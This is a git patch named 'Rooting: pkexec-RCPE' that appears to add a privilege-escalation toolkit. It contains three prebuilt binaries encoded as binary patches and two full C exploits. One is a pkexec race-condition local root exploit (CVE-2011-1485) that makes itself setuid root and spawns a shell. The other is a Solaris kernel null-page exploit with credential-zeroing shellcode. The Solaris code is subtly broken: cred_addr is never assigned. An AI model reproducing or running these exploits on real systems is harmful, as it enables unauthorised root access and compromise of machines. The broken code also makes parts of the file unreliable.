From 4ea5c49f7779e3837fffa814749d791b0c6a474d Mon Sep 17 00:00:00 2001 From: syn Date: Mon, 24 Feb 2025 14:06:52 +0700 Subject: [PATCH] Rooting: pkexec-RCPE --- .null | 0 compile/dirty | Bin 0 -> 17328 bytes compile/pkexec-RCPE | Bin 0 -> 17056 bytes compile/rootme | Bin 0 -> 16264 bytes pkexec-RCPE.c | 201 +++++++++++++++++++++++++++++++++++++++++++ solaris-5.10.c | 204 ++++++++++++++++++++++++++++++++++++++++++++ 6 files changed, 405 insertions(+) create mode 100644 .null create mode 100755 compile/dirty create mode 100755 compile/pkexec-RCPE create mode 100755 compile/rootme create mode 100644 pkexec-RCPE.c create mode 100644 solaris-5.10.c diff --git a/.null b/.null new file mode 100644 index 0000000..e69de29 diff --git a/compile/dirty b/compile/dirty new file mode 100755 index 0000000000000000000000000000000000000000..b06bb856ad3f845d5faa364fcac6b6f5a92a6b97 GIT binary patch literal 17328 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 Hd{F!sGu%+uLq72;ljQgDgQ1gYTcrzryv6kEk2 zIIj__#XOMbNX{+~+5n|?y67#&O5!U3(XIwFCGg`mEf~3lh-g4WH&~3j5Aap zBgYe)kH=Pur;7DZhKW(N>nA%ETWmAIh;?A_mEGz5h^y?v|!}=J`Z*n zmk*lwHt(VO%H4-7#h;PFE9zp=@Rr89Sfn-;53M&ZrcGW)}_)N~gRrTlw@zK4Sjnh}oAET{dt%8nm<*(%39DCxqlpOEfl1Fky{CVl-fKi- z0^MNu+9G!DYTe$fZ}c}7avS}d3;9irLT~MA(<5fe?2D!?Gu74B97`t5E+ZT>!EawY znV|OQwrWX5xFj$1q6&CxRKOqRW)b^Wg)l&epQGi`D0I6yVjpptmC*&*J2ND|^u*K9 z9lhcZ$e8$j$L|>*1^Y0)&zQeN-|=-3Yi5a3kPGz>R<#0XG8WBJhu@)z`J5cPh1!xo_18p$$)1-u!uO z==I9e(j>n*40L{71kP1!f&%sXv1IykKA-O$lQIs>rhhjp17ww{6;M*D5s68STPN zYdJVrM-D3Um+ZK(J>H*e0Erm2ZoRA{bgf}R z8y)^8urK4-^duZm_2g6^)Yv;I3#x@SGK_ZG&;)csSv&~Ex#6QgP7Xf{XK7~p(Q?D% zl0N}w^a=itK^FK4gvsHv0N5X2u7cA^?1``99A>InI(-b4Mn|zpBf}`jhH1HT(5kC9 zuxxk+RdU0J5k_nnUGWywrRDwzjXwd-#MBkg9h&fHM>UV4`I4gf%d(o^Ry3a|t9eM# z>?^AoRx|@;HFqeQ%T&!mBxHO^8hJ{_Wy7i5dARo6@NtaN=qTP3iYJE0j;HZ1lMvj; zK#-x+M!K&>w7ZwfK4Q(Cx*rPOI4z%J`5r2~dC-xY+z7Z4a3kPGz>R<#0XG6}1l$O? z5%?%0;DO(4j9^_vbarp=e6X`C)D{TG;1?{>6589*)TIULBIf?O-egjAwYG)YySoAn z^`fb{tF?W1AZ5mr`%SSY)YiT?q&K&<1nNwyr*6PVrw>G+k)Bl*pREVP>HX_4LqM); zCZ9h77yR<#0XG6}1l$OG z;0W-#I9>vUjgOy){sB=WmC!=cbHyE`8r+ye@N!*Aom{` z@Vai*VLjdNAYljLmk9?5vxH-W#|Tw_?*f}ab!RES3*gZ1)r$^2odzoPJ*G5-Q&O0~b-b&X3u%f;4D zvWHnL*|Ng=dG_)rsb5og-k6_(OsVzGiy$CAR&wAG$-~D?p+lb@LRxPOST_X5>#r%C`{Fr6>_pDitDfpK4GRoGm_N%V#%-((<4?gmDY{Spy)})2V$mWM*Q`q zHE`{HR5wy77Z#9siu-iD{exIbbZI3rnZnC+TEhV z^7xhqcQ>`QHUkYCF7%K_rCQ4#q3_()zP)Le-o9f;XQ)f>YTCXl1QzOg{~#~df1ic< zv|*s2j%)gLGh$eVkXHtti+2PRG#hCfL4iP1xuu|pfv|!zd*wekE8Yg6N76~X-$+Do zi$H5TXhot4J(D(JCj#tb0R3<}O}26u18!0%a*z8NiU``yP{ipvY)0VN;x2`fTMvr2 zQWQJDJ4ah6iVB23eK2krVL&ToV?XC$SB04x5dK8cGW~stjDH}N957SXK?fDiL}4#a zG(uF<_SRbLt5Ut+NcRhWb&<{*gJc|kiVZ@Ay=r|#Mx0dFkXKJ0#LTW}t#GU8EiW}Cyk5`K7K;_w`l zdL};vhvPsPP;8M5C_dOZGTblPLgRQvA&hcRLQh3^-A$9P@@Dl)0} z|5;$2_CB&>93wjh{yZ|ipxBR70VC^`vmaONC&+*?%Z7yPkMS3ZJ&#KmcPbMYwqv)i zD)u~HW8`@!>#OnmHQDq17e3M?{33}As{NZ#fbnPha{EHd+5cIwAM@Foj6Y&SLhe6I zUxCbGI5as50FttNX_ zAM0|aB~(AD7mC<^U4gMPZ0|(wJ5JTDTt9WVPe37#W4S&2{>Awzx7}$UY_z3*#W~l@ Tx=YH~AIA?Hq?L++B8vY37eCNR literal 0 HcmV?d00001 diff --git a/pkexec-RCPE.c b/pkexec-RCPE.c new file mode 100644 index 0000000..9e30cd7 --- /dev/null +++ b/pkexec-RCPE.c @@ -0,0 +1,201 @@ +/* +* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit +* Author: xi4oyu +* Tested on: rhel 6 +* CVE : 2011-1485 +* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~ +¡Á U can reach us @ http://www.wooyun.org :) +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + +int main(int argc,char *argv[], char ** envp) +{ + + time_t tim_seed1; + pid_t pid_seed2; + int result; + struct stat stat_buff; + + char * chfn_path = "/usr/bin/chfn"; + char cmd_buff[4096]; + + char * pkexec_argv[] = { + "/usr/bin/pkexec", + "/bin/sh", + "-c", + cmd_buff, + NULL + }; + int pipe1[2]; + int pipe2[2]; + int pipe3[2]; + pid_t pid,pid2 ; + char * chfn_argv[] = { + "/usr/bin/chfn", + NULL + }; + + char buff[8]; + char read_buff[4096]; + char real_path[512]; + struct termios termios_p; + + int count = 0; + int flag = 0; + int usleep1 = 0; + int usleep2 = 0; + + + bzero(cmd_buff,4096); + bzero(real_path,512); + realpath(argv[0],real_path); + + tim_seed1 = time(NULL); + pid_seed2 = getpid(); + srand(tim_seed1+pid_seed2); + + + + + //get terminal attr + tcgetattr(0,&termios_p); + snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path); +// printf("Cmd line:%s",cmd_buff); + if(! geteuid()){ + //Succs => r00t! + char * exec_argv[2]={ + "/bin/sh", + NULL + }; + setuid(0); + setgid(0); + execve("/bin/sh",exec_argv,0); + perror("execve shell"); + exit(-1); + } + + printf("pkexec local root exploit by xi4oyu , thx to dm\n"); + + if(pipe(pipe1)){ + perror("pipe"); + exit(-2); + } + + for(count = 500; count && !flag; count--){ + + // printf("Count %d\n",count); + pid = fork(); + if( !pid ){ + // Parent + if( !pipe(pipe2)){ + + if(!pipe(pipe3)){ + pid2 = fork(); + if(!pid2){ + // Parent 2 + close(1); + close(2); + close(pipe1[0]); + dup2(pipe1[1],2); + dup2(pipe1[1],1); + close(pipe1[1]); + close(pipe2[0]); + close(pipe3[1]); + write(pipe2[1],"\xFF",1); + read(pipe3[0],&buff,1); + + execve(pkexec_argv[0],pkexec_argv,envp); + perror("execve pkexec"); + exit(-3); + + } + close(0); + close(1); + close(2); + close(pipe2[1]); + close(pipe3[0]); + read(pipe2[0],&buff,1); + write(pipe3[1],"\xFF",1); + usleep(usleep1+usleep2); + + execve(chfn_argv[0],chfn_argv,envp); + perror("execve setuid"); + exit(1); + } + + + } + perror("pipe3"); + exit(1); + } + + //Note: This is child, no pipe3 we use poll to monitor pipe1[0] + memset(pipe3,0,8); + + struct pollfd * pollfd = (struct pollfd *)(&pipe3); + pollfd->fd = pipe1[0]; + pollfd->events = POLLRDNORM; + + if(poll(pollfd,1,1000) < 0){ + + perror("poll"); + exit(1); + } + + if(pollfd->revents & POLLRDNORM ){ + memset(read_buff,0,4096); + read(pipe1[0],read_buff,4095); + if( strstr(read_buff,"does not match")){ + usleep1 += 500; + usleep2 = rand() % 1000; + + }else{ + usleep1 -= 500; + + + } + + + } + + if(!stat(real_path,&stat_buff)){ + if(!stat_buff.st_uid){ + if(!stat_buff.st_gid){ + if(stat_buff.st_mode & 0x800){ + + char *exec_array[]={ + real_path, + NULL + }; + + flag = 1; + tcsetattr(0,2,&termios_p); + execve(real_path,exec_array,0); + perror("execve self"); + exit(1); + } + } + + } + } + + tcsetattr(0,2,&termios_p); + + } + result = 0; + return result; + +} + diff --git a/solaris-5.10.c b/solaris-5.10.c new file mode 100644 index 0000000..4f3c3d1 --- /dev/null +++ b/solaris-5.10.c @@ -0,0 +1,204 @@ +/*********************************************************** + * hoagie_solaris_siocgtunparam.c + * LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01) - CVE-2008-568 + * + * Bug reported by Tobias Klein + * http://www.trapkit.de/advisories/TKADV2008-015.txt + * Exploit by: peri.carding (http://www.void.at/main/) + * + * $ ./hoagie_solaris_siocgtunparam + * hoagie_solaris_siocgtunparam.c - solaris root < < 5.10 138888-01 local + * -andi / void.at + * + * [*] socket created + * [*] mapping zero page successful + * [*] process cred address: 0xd3853894 + * [*] prepare null page + * [*] clean up write queue + * # uname -a + * SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc + * # id + * uid=0(root) gid=0(root) + * # + * + * First of all we have to make sure that ip_extract_tunreq() will + * return 0 and ipifp is still set to NULL. This can be achieved by + * using an interface alias starting with zero. (the interface ip.tun0 + * must not exist because ipif_lookup_on_name() will "fail" to get + * null page) + * + * ip_if.c / ipif_lookup_on_name() + * ... + * if (&cp[2] < endp && cp[1] == '0') + * return (NULL); + * ... + * + * In ip_sioctl_tunparam() ipif->ipif_ill is used for mutex enter + * so we have to set the offet for an ill_t structure. Later putnext() + * will be called with a queue (see ill_t). We can use this queue to + * add a custom callback function that is used by putnext(). + * + * ip_if.c / ip_sioctl_tunparam(): + * ... + * ill = ipif->ipif_ill; + * mutex_enter(&connp->conn_lock); + * mutex_enter(&ill->ill_lock); + * ... + * if (success) { + * ip1dbg(("sending down tunparam request ")); + * putnext(ill->ill_wq, mp1); + * return (EINPROGRESS); + * ... + * + * putnext.c / putnext(): + * ... + * mutex_exit(QLOCK(qp)); + * STR_FTEVENT_MSG(mp, fqp, FTEV_PUTNEXT, mp->b_rptr - + * mp->b_datap->db_base); + * (*putproc)(qp, mp); + * ... + * + * ill_wq can't be modified from kernel space because its allocated + * in userland -> so we cannot modify the ill_wq queue in kernel + * code. thereforce a signal handler will clean the queue in userland. + * + * Affected Software: Solaris 10 without patch 138888-01 (SPARC) + * Solaris 10 without patch 138889-01 (x86) + * OpenSolaris < snv_77 (SPARC) + * OpenSolaris < snv_77 (x86) + * + * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- + * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY + * DAMAGE DONE USING THIS PROGRAM. + * + * VOID.AT Security + * andi@void.at + * http://www.void.at + * + ************************************************************/ +#define _STRUCTURED_PROC 1 + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int *nullpage; + +void clean_up_wq() { + fprintf(stderr, "[*] clean up write queue\n"); + *(nullpage + 0x208 / 4) = 0x000; +} + +int get_proc_address() { + int fd; + char filename[512]; + psinfo_t psinfo; + + snprintf(filename, sizeof(filename), "/proc/%d/psinfo", getpid()); + fd = open(filename, O_RDONLY); + if (fd == -1) { + return -1; + } + + memset(&psinfo, 0, sizeof(psinfo_t)); + if (read(fd, &psinfo, sizeof(psinfo_t)) != sizeof(psinfo_t)) { + close(fd); + return -1; + } + + close(fd); + + return psinfo.pr_addr; +} + +/** + * \xff\xff\xff\xff will be replaced by target process credential address + * (can be any process). set cr_uid, cr_gid, cr_ruid and cr_rguid to 0. + */ +char shellcode[] = + "\x50" + "\xb8\xff\xff\xff\xff" + "\x8b\x00" + "\xc7\x40\x10\x00\x00\x00\x00" + "\xc7\x40\x0c\x00\x00\x00\x00" + "\xc7\x40\x08\x00\x00\x00\x00" + "\xc7\x40\x04\x00\x00\x00\x00" + "\x58" + "\xc3"; + +int main(int argc, char **argv) { + int s; + struct iftun_req req; + int cred_addr; + + fprintf(stderr, + "hoagie_solaris_siocgtunparam.c - solaris root < < 5.10 138888-01 local\n" + "-andi / void.at\n\n"); + + s = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); + if (s == -1) { + fprintf(stderr, "[-] can't create socket\n"); + return -1; + } else { + fprintf(stderr, "[*] socket created\n"); + } + + memset(&req, 0, sizeof(req)); + strcpy(req.ifta_lifr_name, "ip.tun0:012"); + + nullpage = (int*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANON, -1, 0); + if (nullpage == MAP_FAILED) { + fprintf(stderr, "[-] can't mmap null page\n"); + return -2; + } else { + fprintf(stderr, "[*] mapping zero page successful\n"); + } + + if (cred_addr == -1) { + fprintf(stderr, "[-] can't get process address\n"); + return -3; + } else { + cred_addr += 0x5 * sizeof(int *); + fprintf(stderr, "[*] process cred address: 0x%08x\n", cred_addr); + memcpy(shellcode + 2, &cred_addr, 4); + } + + fprintf(stderr, "[*] prepare null page\n"); + memset(nullpage, 0, 0x1000); + /* offset 0x0 = ipif_t */ + /* offset 0x4 = ipif_ll */ + *(nullpage + 0x004 / 4) = 0x200; + /* offset 0x200 = ill_t */ + /* offset 0x008 = ill_wq */ + *(nullpage + 0x208 / 4) = 0x400; + /* offset 0x400 = queue_t */ + /* offset 0x00c = q_next */ + *(nullpage + 0x40c / 4) = 0x600; + /* offset 0x600 = queue_t (second) */ + /* offset 0x000 = qinfo */ + *(nullpage + 0x600 / 4) = 0x800; + /* offset 0x800 = qinfo */ + /* offset 0x000 = qi_putp */ + *(nullpage + 0x800 / 4) = 0x900; + memcpy((char*)nullpage + 0x900, shellcode, sizeof(shellcode)); + + /* install signla handler to clean up write queue */ + signal(SIGALRM, clean_up_wq); + alarm(1); + + /* launch attack */ + ioctl(s, SIOCGTUNPARAM, &req); + + /* start root shell - not really required because p_cred is shared + * but we want the nice # prompt ;-) */ + system("/bin/sh"); + + return 0; +} +